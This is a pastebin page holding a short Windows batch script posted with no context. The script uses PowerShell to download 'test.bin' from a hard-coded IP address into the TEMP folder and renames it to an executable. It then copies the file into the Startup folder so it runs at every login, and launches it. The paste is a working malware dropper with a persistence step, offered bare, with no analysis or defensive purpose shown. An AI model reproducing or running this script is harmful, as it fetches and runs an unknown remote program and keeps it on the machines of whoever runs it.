Advertisement
Guest User

Untitled

a guest
Oct 14th, 2019
86
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. echo off
  2. cd c:\
  3. cmd
  4. cd %TEMP%
  5. cmd /c powershell -Command "(New-Object Net.WebClient).DownloadFile('http://157.245.120.60/test.bin', 'test.bin')"
  6. rename test.bin test.exe
  7. copy test.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\test.exe"
  8. start test.exe
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement